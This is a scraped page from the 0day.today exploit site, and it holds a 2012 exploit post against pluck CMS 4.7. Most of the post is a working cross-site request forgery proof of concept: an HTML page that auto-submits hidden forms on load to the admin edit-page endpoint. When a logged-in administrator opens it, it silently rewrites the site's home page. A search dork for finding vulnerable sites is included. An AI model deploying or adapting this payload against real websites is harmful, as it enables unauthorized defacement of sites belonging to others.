0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
pluck 4.7 CSRF edit index Vulnerability
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 +---------------------------------------+ 1 0 |I'm DoSs-Dz member from Inj3ct0r Team | 1 1 +---------------------------------------+ 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 +----------------------------------------------------------------------------+ # Exploit Title : pluck 4.7 CSRF edit home page # Date : 04 April 2012 # Site for Vendor : http://www.pluck-cms.org/downloads/pluck-4_7.tar.gz # Dork : powered by pluck # Big Thank to : Inj3ct0r Team & Inj3ct0r Operators "CrosS" +----------------------------------------------------------------------------+ [!1»] Exploit P0C =» <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title> Edit html page for home page by : DoSs-Dz </title> </head> <body onload="javascript:fireForms()"> <script language="JavaScript"> var pauses = new Array( "95","119","253","79","89" ); function pausecomp(millis) { var date = new Date(); var curDate = null; do { curDate = new Date(); } while(curDate-date < millis);} function fireForms(){ var count = 5;var i=0; for(i=0; i<count; i++) {document.forms[i].submit(); pausecomp(pauses[i]);}} </script> <H2> Edit html page for home page by : DoSs-Dz </H2> <form method="POST" name="form0" action="http://127.0.0.1:80/xampp/1/admin.php?action=editpage"> <input type="hidden" name="title" value="Hack ing Test"/> < ---- EDit Here <input type="hidden" name="content" value="<p>Hiiiii Geysss</p>"/> < ---- EDit Here <input type="hidden" name="description" value=""/> <input type="hidden" name="keywords" value=""/> <input type="hidden" name="hidden" value="no"/> <input type="hidden" name="sub_page" value=""/> <input type="hidden" name="theme" value="default"/> <input type="hidden" name="save" value="Save"/> </form> </body> </html> +--------------------------------------------------------------------------------------------------------+ |[»] Greetz to =» [ Robert Miles ] , [ Black-ID ] , [ Abdou Abdo ] , [ Hacker_Dz] , [ Damane2011 ] | |[»] Greetz to =» [ 1337day.com ] , [ sec4ever.com ] , [ Dz4all.com ] , [ v4-team.com ] , [ Vbspiders ] | +--------------------------------------------------------------------------------------------------------+ +------------------------------------+ |./ Gharrdaia on : 04 april 2012 | +------------------------------------+ # 0day.today [2024-07-07] #